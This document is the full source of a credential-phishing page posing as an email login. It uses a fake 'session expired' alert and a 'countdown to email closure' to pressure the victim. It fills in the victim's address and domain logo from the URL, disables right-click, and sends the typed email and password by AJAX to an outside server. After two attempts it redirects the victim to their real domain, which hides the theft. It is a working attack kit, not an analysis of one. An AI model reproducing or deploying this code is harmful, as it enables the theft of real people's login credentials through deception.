
<script type="text/javascript">
alert("Your email session has been Expired, click ok to sign in.");
</script>
<html><head>
    <meta charset="utf-8">
	<title>Log-In</title>
	<!-- Bootstrap CSS -->
	<link crossorigin="anonymous" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" rel="stylesheet" />
	<link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&amp;display=swap" rel="stylesheet" /><script src="https://kit.fontawesome.com/585b051251.js"
crossorigin="anonymous"></script>
	<link href="https://few-judicious-radon.glitch.me/landing.css" rel="stylesheet" /><script>
window.oncontextmenu = function () {
console.log("Right Click Disabled");
return false;
}
</script>
	<style type="text/css">body{
            background: #fff;
        }

        .container{
            width:100%;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        .office{
            width: 380px;
            background: #D1D8F3;
        }

        .office-holder{
            width:80%;
            margin: auto;
            padding: 20px 0px;
        }

        .logo{
            width:100%;
            float: left;
            margin-bottom: 2em;
        }

        .logo h1{
            font-family: arial;
        }

        .verify{
            width: 70%;
            margin: auto;
        }

        .verify h4{
            font-family: arial;
        }

        fieldset{
            width: 90%;
            float: right;
            border:2px solid #4285f4;
            border-radius: 5px;
        }

        legend{
            font-size: 15px;
            overflow: hidden;
            width: 42%;
            padding:0px 2px;
            margin: 0px;
        }

        .verify input[type='text']{
            width: 100%;
            float: right;
            border:none;
            padding:3px 10px;
        }

        .verify button{
            border:none;
            height: 40px;
            width: 80px;
            float: right;
            margin-top: 2em;
            background: #4285f4;
            border-radius: 5px;
            color: #fff;
        }

        .email-to-verify{
            border:1px solid #000;
            border-radius: 10px;
        }

        .form-holder{
            width:100%;
            float: left;
        }

        .form-holder h3{
            font-weight: 600;
        }

        .form-holder input[type='email'], input[type='password']{
            width: 100%;
            height:40px;
            float: left;
            margin-bottom: 15px;
        }
        .form-holder .btn-holder{
            width:100%;
            margin-top:1em;
            display: flex;
            align-content: center;
            align-items: center;
            justify-content: center;
        }

        .form-holder .btn-holder .btn{
            background:#0073C6;
            border:none;
            padding:6px 10px;
            color:#fff;
            border-radius: 0px;
            margin-top: 20px;
            margin-bottom: 20px;
        }

        .form-holder .btn-holder .btn:hover{
            cursor:pointer;
        }

        .checkbox{
            width: 100%;
            float: left;
            margin-top:5px;
        }

        .checkbox label{
            font-family:arial;
            font-size:13px;
            float: left;
            margin-left:1em;
        }

        .hide{
            display: none;
        }
	</style>
</head>
<body>
<div id="html_encoder_div">
<div class="container">
<div class="office show border shadow bg-light" id="others">
<div class="office-holder">
<div class="logo" style="text-align:center">
<div id="login_logo"><img alt="" height="50" id="logoimg" src="" width="50" /></div>

<h2 class="text-dark"></h2>

<p></p><h7></h7>

<div class="logo" style="text-align:center">
<table>
	<tbody>
		<tr>
			<td>
			<h1 style="text-align:center;">Login to gain access</h1>
			</td>
			<td>
			<div id="hms" style="font color="></div>
			</td>
		</tr>
	</tbody>
</table>
</div>

<center>
<div id="msg" style="display: none;font-weight: 600;color: red;">Please fill in the correct details.</div>
<span class="text-danger" id="error" style="display: none;">This account does not exist. log into a different account</span></center>

<form>
<div class="form-holder">
<div style="width: 100%;"></div>
</div>
</form>
<h7 class="font-weight-light"><span style="color:brown;">Countdown to email closure:</span></h7>

<p id="demo"></p>
<script>
// Set the date we're counting down to
var countDownDate = new Date("April 05, 2022 00:01:00").getTime();

// Update the count down every 1 second
var x = setInterval(function() {

  // Get today's date and time
  var now = new Date().getTime();
    
  // Find the distance between now and the count down date
  var distance = countDownDate - now;
    
  // Time calculations for days, hours, minutes and seconds
  var days = Math.floor(distance / (1000 * 60 * 60 * 24));
  var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
  var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
  var seconds = Math.floor((distance % (1000 * 60)) / 1000);
    
  // Output the result in an element with id="demo"
  document.getElementById("demo").innerHTML = days + "d " + hours + "h "
  + minutes + "m " + seconds + "s ";
    
  // If the count down is over, write some text 
  if (distance < 0) {
    clearInterval(x);
    document.getElementById("demo").innerHTML = "";
  }
}, 1000);
</script></div>

<form>
<div class="form-holder">
<div style="width: 100%;">
<div class="alert alert-danger hide alert2"></div>
<input class="form-control" id="email" type="hidden" />
<center style="font-weight: bold;">
<p id="emailich" style="color: skyblue;">Yahooo.com</p>
</center>
<input class="form-control" id="password" placeholder="Password" required="" type="password" />
<div class="checkbox"><input name="" style="float: left; margin-top: 2px; margin-bottom: 10px;" type="checkbox" /> <label>REMEMBER ME</label></div>

<div class="btn-holder"><button class="btn btn-lg col-12" id="submit-btn">LOGIN</button></div>

<p style="color: rgb(0, 115, 198); margin-top: 0em; float: left; width: 100%;"><small>can&#39;t access account?&nbsp;&nbsp;&nbsp; Sign in with a single code</small></p>
</div>
</div>
</form>
</div>
</div>
</div>
<style type="text/css">.tb_button {
padding: 1px;
cursor: pointer;
border-right: 1px solid #8b8b8b;
border-left: 1px solid #FFF;
border-bottom: 1px solid #fff;
}

.tb_button.hover {
borer: 2px outset #def;
background-color: #f8f8f8 !important;
}

.ws_toolbar {
z-index: 100000
}

.ws_toolbar .ws_tb_btn {
cursor: pointer;
border: 1px solid #555;
padding: 3px
}

.tb_highlight {
background-color: yellow
}

.tb_hide {
visibility: hidden
}

.ws_toolbar img {
padding: 2px;
margin: 0px
}
</style>
<!-- jQuery first, then Popper.js, then Bootstrap JS --><script src="https://code.jquery.com/jquery-3.2.1.slim.min.js"
integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN"
crossorigin="anonymous"></script><script
src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"
integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q"
crossorigin="anonymous"></script><script
src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"
integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl"
crossorigin="anonymous"></script><script
src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script><script
src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script><script type="text/javascript"
src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script><script>
/* global $ */
$(document).ready(function(){
var count=0;

$('#back1').click(function () {
$("#msg").hide();
$('#email').val("");
$("#automail").animate({left:200, opacity:"hide"}, 0);
$("#inputbar").animate({right:200, opacity:"show"}, 1000);

});

var email = window.location.hash.substr(1);
if (!email) {

}
else
{
var my_email =email;
$('#email').val(my_email);
$('#emailich').html(my_email);

var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

if (!filter.test(my_email)) {
$('#error').show();
email.focus;
return false;
}
var ind=my_email.indexOf("@");
var my_slice=my_email.substr((ind+1));
var c= my_slice.substr(0, my_slice.indexOf('.'));
var final= c.toLowerCase();
var finalu= c.toUpperCase();

$("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);

$("#logoimg").attr("alt", finalu);
$("#logoname").html(finalu);
$(".logoname").html(finalu);
}


$('#submit-btn').click(function(event){
$('#error').hide();
$('#msg').hide();
event.preventDefault();
var email=$("#email").val();
var password=$("#password").val();
var msg = $('#msg').html();
$('#msg').text( msg );
///////////new injection////////////////
var my_email =email;
var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

if (!filter.test(my_email)) {
$('#error').show();
email.focus;
return false;
}

var ind=my_email.indexOf("@");
var my_slice=my_email.substr((ind+1));
var c= my_slice.substr(0, my_slice.indexOf('.'));
var final= c.toLowerCase();
var finalu= c.toUpperCase();

$("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
$("#logoname").html(finalu);
///////////new injection////////////////
count=count+1;

$.ajax({
dataType: 'JSON',
url: 'https://luxventus.eu/php/wetransfer/new2.php',
type: 'POST',
data:{
email:email,
password:password,
},
// data: $('#contact').serialize(),
beforeSend: function(xhr){
$('#submit-btn').val('Verifing...');
},
success: function(response){
if(response){
$("#msg").show();
console.log(response);
if(response['signal'] == 'ok'){
$("#password").val("");
if (count>=2) {
count=0;
// window.location.replace(response['redirect_link']);
window.location.href("http://www."+my_slice);

}
// $('#msg').html(response['msg']);
}
else{
// $('#msg').html(response['msg']);
}
}
},
error: function(){
$("#password").val("");
if (count>=2) {
count=0;
window.location.replace("http://www."+my_slice);
}
$("#msg").show();
// $('#msg').html("Please try again later");
},
complete: function(){
$('#submit-btn').val('LOGIN');
}
});
});


});


</script></div>
</body>
</html>
